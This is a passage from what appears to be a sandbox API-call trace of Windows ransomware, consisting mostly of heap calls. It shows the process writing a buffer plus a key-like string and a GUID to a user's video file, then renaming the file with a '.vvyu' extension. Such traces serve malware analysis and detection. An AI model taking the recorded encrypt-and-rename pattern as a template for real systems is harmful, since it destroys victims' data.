0x2ae69c8 [0198.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0198.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af4180 [0198.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a28 | out: hHeap=0x2c0000) returned 1 [0198.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0198.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a58 | out: hHeap=0x2c0000) returned 1 [0198.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4390 [0198.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0198.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0198.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0198.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0198.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69c8 | out: hHeap=0x2c0000) returned 1 [0198.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af45a8 [0198.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0198.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0198.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0198.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0198.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0198.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0198.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0198.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4390 | out: hHeap=0x2c0000) returned 1 [0198.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af45a8 | out: hHeap=0x2c0000) returned 1 [0198.824] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0198.824] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0198.824] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69f8 | out: hHeap=0x2c0000) returned 1 [0198.824] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0198.824] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a40 | out: hHeap=0x2c0000) returned 1 [0198.824] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0198.824] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69e0 | out: hHeap=0x2c0000) returned 1 [0198.824] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69b0 | out: hHeap=0x2c0000) returned 1 [0198.824] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0198.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0198.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0198.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6998 | out: hHeap=0x2c0000) returned 1 [0198.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeae30 | out: hHeap=0x2c0000) returned 1 [0198.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0198.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0198.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0198.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0198.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0198.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0198.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0198.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0198.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0198.828] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0198.828] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0198.828] WriteFile (in: hFile=0x584, lpBuffer=0x2af7168*, nNumberOfBytesToWrite=0x16fcd, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af7168*, lpNumberOfBytesWritten=0x2f9fb14*=0x16fcd, lpOverlapped=0x0) returned 1 [0198.830] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af7168 | out: hHeap=0x2c0000) returned 1 [0198.830] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x16fd2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.830] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0198.830] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0198.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2efb0 [0198.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0198.831] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0198.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0198.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0198.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2efb0 | out: hHeap=0x2c0000) returned 1 [0198.831] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0198.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0198.832] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0198.832] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0198.832] CloseHandle (hObject=0x584) returned 1 [0198.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0198.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8a0) returned 0x2af3f88 [0198.835] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0198.835] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\wICCgSS9cO9EJxpugq\\wx0aR91G76sZ.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\fpzctgqi5ys\\wiccgss9co9ejxpugq\\wx0ar91g76sz.flv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\wICCgSS9cO9EJxpugq\\wx0aR91G76sZ.flv.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\fpzctgqi5ys\\wiccgss9co9ejxpugq\\wx0ar91g76sz.flv.vvyu")) returned 1 [0198.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0198.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0198.837] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a245f0 | out: hHeap=0x2c0000) returned 1 [0198.840] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccfb2390, ftCreationTime.dwHighDateTime=0x1d8a707, ftLastAccessTime.dwLowDateTime=0xb9918dc0, ftLastAccessTime.dwHighDateTime=0x1d8a717, ftLastWriteTime.dwLowDateTime=0xb9918dc0, ftLastWriteTime.dwHighDateTime=0x1d8a717, nFileSizeHigh=0x0, nFileSizeLow=0x16fd2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wx0aR91G76sZ.flv", cAlternateFileName="WX0AR9~1.FLV")) returned 0 [0198.840] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0198.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0198.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b8e8 | out: hHeap=0x2c0000) returned 1 [0198.841] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0198.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0198.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fa8 | out: hHeap=0x2c0000) returned 1 [0198.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0198.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b860 | out: hHeap=0x2c0000) returned 1 [0198.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b7d8 | out: hHeap=0x2c0000) returned 1 [0198.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0198.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae9020 | out: hHeap=0x2c0000) returned 1 [0198.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae9098 | out: hHeap=0x2c0000) returned 1 [0198.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8f30 | out: hHeap=0x2c0000) returned 1 [0198.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31ba80 | out: hHeap=0x2c0000) returned 1 [0198.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29dcde8 | out: hHeap=0x2c0000) returned 1 [0198.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31ba80 [0198.845] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0198.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.847] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.847] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0198.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2aeaea0 [0198.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0198.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.854] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.854] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.854] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0198.854] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.854] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.854] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.855] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0198.855] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.855] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.855] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.855] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0198.856] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.856] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.856] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.857] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.857] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0198.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0198.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.861] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.861] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.862] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.862] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.864] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.864] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.864] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0198.865] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.865] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0198.865] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.865] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.865] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.865] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2aeaea0 [0198.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0198.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0198.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0198.868] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.868] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.868] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.870] RtlAllocateHeap (HeapHandle=0x2c0000, 